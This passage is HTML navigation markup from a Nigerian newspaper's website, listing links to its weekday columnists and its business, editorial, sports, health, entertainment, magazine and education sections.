data-item-row="default"><a href="https://thenationonlineng.net/category/dele-agekameh/">Dele Agekameh</a></li> <li id="menu-item-652811" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652811 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/tony-marinho/">Tony Marinho</a></li> <li id="menu-item-652832" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652832 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/louis-odion/">Louis Odion</a></li> </ul> </li> <li id="menu-item-652787" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-652787 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/columnists/thursday/">Thursday</a> <ul class="sub-menu"> <li id="menu-item-652816" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652816 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/gbenga-omotoso/">Gbenga Omotoso</a></li> <li id="menu-item-652817" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652817 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/jide-oluwajuyitan/">Jide Oluwajuyitan</a></li> <li id="menu-item-652818" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652818 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/jide-osuntokun/">Jide Osuntokun</a></li> <li id="menu-item-652819" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652819 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/lawal-ogienagbon/">Lawal Ogienagbon</a></li> </ul> </li> <li id="menu-item-652791" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-652791 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/columnists/friday/">Friday</a> <ul class="sub-menu"> <li id="menu-item-652823" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652823 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/femi-abbas/">Femi Abbas</a></li> <li id="menu-item-934888" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-934888 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/columnists/korede-yishau/">Korede Yishau</a></li> <li id="menu-item-652826" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652826 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/segun-gbadegesin/">Segun Gbadegesin</a></li> <li id="menu-item-652827" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652827 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/steve-osuji/">Steve Osuji</a></li> <li id="menu-item-652825" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652825 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/olatunji-ololade/">Olatunji Ololade</a></li> </ul> </li> <li id="menu-item-652790" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-652790 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/columnists/saturday/">Saturday</a> <ul class="sub-menu"> <li id="menu-item-652837" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652837 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/ade-ojeikere/">Ade Ojeikere</a></li> <li id="menu-item-652838" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652838 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/dayo-sobowale/">Dayo Sobowale</a></li> <li id="menu-item-652840" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652840 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/segun-ayobolu/">Segun Ayobolu</a></li> <li id="menu-item-652835" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652835 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/victor-akande/">Victor Akande</a></li> <li id="menu-item-652836" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652836 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/yomi-odunuga/">Yomi Odunuga</a></li> <li id="menu-item-656186" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-656186 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/columnists/under-tow-saturday/">UnderTow</a></li> <li id="menu-item-971488" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-971488 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/columnists/saturday/sentry/">Sentry</a></li> </ul> </li> <li id="menu-item-652786" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-652786 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/columnists/sunday/">Sunday</a> <ul class="sub-menu"> <li id="menu-item-652849" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652849 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/tatalo-alamu/">Tatalo Alamu</a></li> <li id="menu-item-652858" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652858 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/idowu-akinlotan/">Idowu Akinlotan</a></li> <li id="menu-item-652857" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652857 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/festus-eriye/">Festus Eriye</a></li> <li id="menu-item-652850" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652850 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/tunji-adegboyega/">Tunji Adegboyega</a></li> <li id="menu-item-652844" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652844 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/biodun-jeyifo/">Biodun Jeyifo</a></li> <li id="menu-item-652854" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652854 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/ropo-sekoni/">Ropo Sekoni</a></li> <li id="menu-item-652856" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652856 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/femi-orebe/">Femi Orebe</a></li> <li id="menu-item-652859" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652859 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/lekan-otufodunrin/">Lekan Otufodunrin</a></li> <li id="menu-item-666302" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-666302 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/niyi-osundare/">Niyi Osundare</a></li> <li id="menu-item-652867" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652867 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/columnists/oyinkan-medubi/">Oyinkan Medubi</a></li> <li id="menu-item-738756" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-738756 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/barometer/">Barometer</a></li> </ul> </li> </ul> </li> <li id="menu-item-74" class="business-wrap-cls menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-74 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/business/">Business</a> <ul class="sub-menu"> <li id="menu-item-652399" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652399 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/business/latest-agriculture-news/">Agriculture</a></li> <li id="menu-item-652400" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652400 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/business/aviation/">Aviation</a></li> <li id="menu-item-652401" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652401 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/business/brand-week/">Brand week</a></li> <li id="menu-item-652402" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652402 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/business/building-properties/">Building &#038; Properties</a></li> <li id="menu-item-652403" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652403 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/business/capital-market-updates/">Capital Market</a></li> <li id="menu-item-652404" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652404 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/business/ceo/">CEO</a></li> <li id="menu-item-590754" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-590754 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/business/e-business/">e-Business</a></li> <li id="menu-item-652406" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652406 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/business/energy/">Energy</a></li> <li id="menu-item-719017" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-719017 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/business/money/">Money</a></li> <li id="menu-item-652407" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652407 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/business/equities/">Equities</a></li> <li id="menu-item-652408" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652408 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/business/export-digest/">Export Digest</a></li> <li id="menu-item-696414" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-696414 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/business/transportation-business/">Transportation</a></li> </ul> </li> <li id="menu-item-403663" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-403663 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/editorials/">Editorial</a> <ul class="sub-menu"> <li id="menu-item-689830" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-689830 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/comments/">Comments</a></li> <li id="menu-item-403666" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-403666 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/commentaries/hardball/">Hardball</a></li> <li id="menu-item-658423" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-658423 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/commentaries/opinion/">Opinion</a></li> <li id="menu-item-403665" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-403665 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/commentaries/cartoon/">Cartoon</a></li> </ul> </li> <li id="menu-item-403620" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-403620 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/sports2/sports-news/">Sports</a></li> <li id="menu-item-403662" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-403662 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/health/">Health</a></li> <li id="menu-item-403618" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-403618 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/entertainment/">Entertainment</a> <ul class="sub-menu"> <li id="menu-item-403667" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-403667 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/entertainment/entertainment-3/celebrity/">Celebrity</a></li> </ul> </li> <li id="menu-item-403621" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-403621 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/arts-life/life-the-midweek-magazine/">Magazine</a> <ul class="sub-menu"> <li id="menu-item-652415" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652415 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/niger-delta-3/">Niger Delta</a></li> <li id="menu-item-652414" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652414 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/northern-report/">Northern Report</a></li> <li id="menu-item-652418" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652418 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/southeast-2/">SouthEast</a></li> <li id="menu-item-652419" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652419 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/southwest/">Southwest</a></li> <li id="menu-item-652422" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652422 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/saturday-magazine/crime-diary/">Crime Diary</a></li> <li id="menu-item-652416" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652416 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/family-health/">Family Health</a></li> <li id="menu-item-652417" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652417 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/saturday-magazine/fashion/">Fashion</a></li> <li id="menu-item-652409" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652409 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/saturday-magazine/">Saturday Magazine</a></li> <li id="menu-item-652410" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652410 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/sunday-magazine/">Sunday magazine</a></li> <li id="menu-item-652420" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652420 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/saturday-magazine/weekend-treat/">Weekend Treat</a></li> <li id="menu-item-652421" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652421 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/sunday-magazine/worship/">Worship</a></li> </ul> </li> <li id="menu-item-403619" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-403619 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/education-news-nigeria/">Education</a> <ul class="sub-menu"> <li id="menu-item-403664" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-403664 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/nigeria-universities-breaking-news/">Campus Life</a></li> </ul> </li> <li id="menu-item-652398" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652398 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/online-special/">Online Special</a></li> <li id="menu-item-1037022" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1037022 bgnav" data-item-row="default"><a href="http://community.thenationonlineng.net/forum/">Forum</a></li> </ul></div></div> </div> </div> <div class="jeg_nav_col jeg_nav_center jeg_nav_normal"> <div class="item_wrap jeg_nav_aligncenter"> </div> </div> <div class="jeg_nav_col jeg_nav_right jeg_nav_normal"> <div class="item_wrap jeg_nav_alignright"> </div> </div> </div> </div> </div></div> </div> <div class="jeg_header_sticky"> <div class="sticky_blankspace"></div> <div class="jeg_header normal"> <div class="jeg_container"> <div data-mode="scroll" class="jeg_stickybar jeg_navbar jeg_navbar_wrapper jeg_navbar_normal jeg_navbar_dark"> <div class="container"> <div class="jeg_nav_row"> <div class="jeg_nav_col jeg_nav_left jeg_nav_grow"> <div class="item_wrap jeg_nav_alignleft"> <div class="jeg_main_menu_wrapper"> <div class="jeg_nav_item jeg_mainmenu_wrap"><ul class="jeg_menu jeg_main_menu jeg_menu_style_1" data-animation="animate"><li class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-919890 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/">Home</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-124 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/news/">News</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-126 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/politics/">Politics</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-652781 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/columnists/">Columnists</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-652784 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/columnists/monday/">Monday</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652795 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/sam-omatseye/">Sam Omatseye</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652793 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/emeka-omeihe/">Emeka Omeihe</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652794 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/columnists/monday/femi-macaulay/">Femi Macaulay</a></li> </ul> </li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-652788 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/columnists/tuesday/">Tuesday</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-919509 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/columnists/gabriel-amalu/">Gabriel Amalu</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652802 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/olatunji-dare/">Olatunji Dare</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652801 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/olakunle-abimbola/">Olakunle Abimbola</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652803 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/sanya-oni/">Sanya Oni</a></li> </ul> </li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-652789 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/columnists/wednesday/">Wednesday</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652830 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/dele-agekameh/">Dele Agekameh</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652811 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/tony-marinho/">Tony Marinho</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652832 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/louis-odion/">Louis Odion</a></li> </ul> </li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-652787 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/columnists/thursday/">Thursday</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652816 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/gbenga-omotoso/">Gbenga Omotoso</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652817 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/jide-oluwajuyitan/">Jide Oluwajuyitan</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652818 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/jide-osuntokun/">Jide Osuntokun</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652819 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/lawal-ogienagbon/">Lawal Ogienagbon</a></li> </ul> </li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-652791 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/columnists/friday/">Friday</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652823 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/femi-abbas/">Femi Abbas</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-934888 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/columnists/korede-yishau/">Korede Yishau</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652826 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/segun-gbadegesin/">Segun Gbadegesin</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652827 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/steve-osuji/">Steve Osuji</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652825 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/olatunji-ololade/">Olatunji Ololade</a></li> </ul> </li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-652790 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/columnists/saturday/">Saturday</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652837 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/ade-ojeikere/">Ade Ojeikere</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652838 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/dayo-sobowale/">Dayo Sobowale</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652840 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/segun-ayobolu/">Segun Ayobolu</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652835 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/victor-akande/">Victor Akande</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652836 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/yomi-odunuga/">Yomi Odunuga</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-656186 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/columnists/under-tow-saturday/">UnderTow</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-971488 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/columnists/saturday/sentry/">Sentry</a></li> </ul> </li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-652786 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/columnists/sunday/">Sunday</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652849 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/tatalo-alamu/">Tatalo Alamu</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652858 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/idowu-akinlotan/">Idowu Akinlotan</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652857 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/festus-eriye/">Festus Eriye</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652850 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/tunji-adegboyega/">Tunji Adegboyega</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652844 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/biodun-jeyifo/">Biodun Jeyifo</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652854 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/ropo-sekoni/">Ropo Sekoni</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652856 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/femi-orebe/">Femi Orebe</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652859 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/lekan-otufodunrin/">Lekan Otufodunrin</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-666302 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/niyi-osundare/">Niyi Osundare</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652867 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/columnists/oyinkan-medubi/">Oyinkan Medubi</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-738756 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/barometer/">Barometer</a></li> </ul> </li> </ul> </li> <li class="business-wrap-cls menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-74 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/business/">Business</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652399 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/business/latest-agriculture-news/">Agriculture</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652400 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/business/aviation/">Aviation</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652401 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/business/brand-week/">Brand week</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652402 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/business/building-properties/">Building &#038; Properties</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652403 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/business/capital-market-updates/">Capital Market</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652404 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/business/ceo/">CEO</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-590754 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/business/e-business/">e-Business</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652406 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/business/energy/">Energy</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-719017 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/business/money/">Money</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652407 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/business/equities/">Equities</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652408 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/business/export-digest/">Export Digest</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-696414 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/business/transportation-business/">Transportation</a></li> </ul> </li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-403663 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/editorials/">Editorial</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-689830 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/comments/">Comments</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-403666 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/commentaries/hardball/">Hardball</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-658423 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/commentaries/opinion/">Opinion</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-403665 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/commentaries/cartoon/">Cartoon</a></li> </ul> </li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-403620 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/sports2/sports-news/">Sports</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-403662 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/health/">Health</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-403618 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/entertainment/">Entertainment</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-403667 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/entertainment/entertainment-3/celebrity/">Celebrity</a></li> </ul> </li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-403621 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/arts-life/life-the-midweek-magazine/">Magazine</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652415 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/niger-delta-3/">Niger Delta</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652414 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/northern-report/">Northern Report</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652418 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/southeast-2/">SouthEast</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652419 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/southwest/">Southwest</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652422 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/saturday-magazine/crime-diary/">Crime Diary</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652416 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/family-health/">Family Health</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652417 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/saturday-magazine/fashion/">Fashion</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652409 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/saturday-magazine/">Saturday Magazine</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652410 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/sunday-magazine/">Sunday magazine</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652420 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/saturday-magazine/weekend-treat/">Weekend Treat</a></li> 